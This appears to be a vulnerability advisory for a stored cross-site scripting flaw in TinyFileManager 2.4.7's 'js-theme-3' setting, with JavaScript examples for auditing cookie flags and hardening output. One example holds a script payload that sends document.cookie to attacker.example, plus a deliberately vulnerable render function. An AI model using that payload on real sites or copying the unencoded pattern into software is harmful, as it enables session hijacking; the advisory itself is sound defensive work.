TinyFileManager Stored Cross-Site Scripting Vulnerability

Vulnerability

A stored cross-site scripting (XSS) vulnerability has been identified in TinyFileManager version 2.4.7, in the '/tinyfilemanager.php' component. The value submitted in the 'js-theme-3' parameter is stored and later written back into the page without output encoding, so an attacker who can save settings can inject a crafted payload that executes arbitrary JavaScript or HTML in the browser of anyone who loads the affected page.

Impact

Because the payload is stored, the injected script runs on every render of the affected page, including the login screen, so unauthenticated visitors are exposed as well. The 'filemanager' cookie, which TinyFileManager uses as the session identifier, is set without the HttpOnly flag, so the injected script can read it through document.cookie and send it to an attacker-controlled host. Combined with the previously reported session fixation vulnerability in TinyFileManager, the same script could instead write a fixed 'filemanager' cookie value into the victim's browser; once the victim authenticates under that fixed value, the attacker could log in as that user by presenting the same cookie.
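The cookie weakness described above is straightforward to check from the response headers. The following is an added example (not TinyFileManager code) that parses a Set-Cookie header and reports which of the attributes HttpOnly, Secure and SameSite are absent; the two sample headers are constructed for illustration, the first mirroring a session cookie set with no flags and the second the hardened form.

```javascript
// Added example, not part of TinyFileManager: audit a Set-Cookie header for the
// attributes whose absence makes a session cookie easy to steal or fix.

// Parse one Set-Cookie header value into its name, value and lower-cased attribute map.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...valueParts] = parts[0].split('=');
  const attrs = {};
  for (const part of parts.slice(1)) {
    const eq = part.indexOf('=');
    const key = (eq === -1 ? part : part.slice(0, eq)).toLowerCase();
    attrs[key] = eq === -1 ? true : part.slice(eq + 1);
  }
  return { name: name.trim(), value: valueParts.join('='), attrs };
}

// Return the findings for a session cookie. An empty list means the cookie
// carries HttpOnly, Secure and an explicit SameSite attribute.
function auditSessionCookie(header) {
  const cookie = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in cookie.attrs)) {
    findings.push('missing HttpOnly: readable via document.cookie, so an XSS payload can exfiltrate it');
  }
  if (!('secure' in cookie.attrs)) {
    findings.push('missing Secure: sent over plaintext HTTP');
  }
  if (!('samesite' in cookie.attrs)) {
    findings.push('missing SameSite: attached to cross-site requests');
  }
  return { name: cookie.name, findings };
}

// Constructed sample headers (the cookie value is made up for the example).
const WEAK_HEADER = 'filemanager=5f3a9c1e2b7d4; path=/';
const HARDENED_HEADER = 'filemanager=5f3a9c1e2b7d4; path=/; HttpOnly; Secure; SameSite=Strict';

for (const header of [WEAK_HEADER, HARDENED_HEADER]) {
  const result = auditSessionCookie(header);
  console.log(result.name, result.findings.length === 0 ? 'OK' : result.findings);
}
```

Note that HttpOnly only prevents the script from reading the cookie; it does not stop a payload from writing a new 'filemanager' cookie, which is why the session fixation issue mentioned above still matters once a script is running in the victim's origin.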

Reproduction

To reproduce this vulnerability, navigate to the Settings page and submit a crafted payload (for example an HTML tag that carries a script) in the 'js-theme-3' parameter. The stored value is written back into the page without encoding, so the script executes as soon as the page is rendered again, demonstrating the stored cross-site scripting vulnerability.
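The following is an added example, not code from TinyFileManager, that simulates the sink described in the reproduction step: a stored theme setting written back into page markup. The vulnerable function concatenates the saved value into the HTML the way an unencoded echo would; the hardened function restricts the value to an allowlist and HTML-encodes it before output. The payload, the allowlist and the surrounding markup are constructed for illustration and are not taken from the project.

```javascript
// Added example, not TinyFileManager code: a simulated render of the stored
// 'js-theme-3' value, vulnerable form beside the hardened form.

// Constructed stored-XSS payload of the kind the reproduction step describes:
// breaks out of the attribute and drops a script that exfiltrates the cookie.
const PAYLOAD = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable: the saved value is concatenated straight into the markup
// (hypothetical markup standing in for the real page).
function renderThemeVulnerable(savedTheme) {
  return `<input type="hidden" name="js-theme-3" value="${savedTheme}">`;
}

// Minimal HTML encoder for text placed inside element content or quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Constructed allowlist: a theme selector has a fixed set of legitimate values,
// so anything else is replaced by the default rather than rendered.
const ALLOWED_THEMES = ['light', 'dark'];

// Hardened: allowlist first, then encode the (now known-good) value anyway so
// the output is safe even if the allowlist later gains a value with special characters.
function renderThemeHardened(savedTheme, fallback = 'light') {
  const theme = ALLOWED_THEMES.includes(savedTheme) ? savedTheme : fallback;
  return `<input type="hidden" name="js-theme-3" value="${escapeHtml(theme)}">`;
}

// Check used to compare the two renders: does a script tag survive into the markup?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('vulnerable renders script tag:', containsScriptTag(renderThemeVulnerable(PAYLOAD)));
console.log('hardened renders script tag:  ', containsScriptTag(renderThemeHardened(PAYLOAD)));
```

Encoding alone is enough to neutralise this particular payload, since `escapeHtml(PAYLOAD)` contains no literal `<`; the allowlist is the stronger fix for a field that only ever holds one of a few theme names, and it also closes off attribute-context tricks that depend on characters the encoder does not touch.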

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

Category         Score
spread           5.0
impact           1.7
exploitability   6.3
remediation      0.0
relevance        0.0
threat           6.4
urgency          2.9
incentive        1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.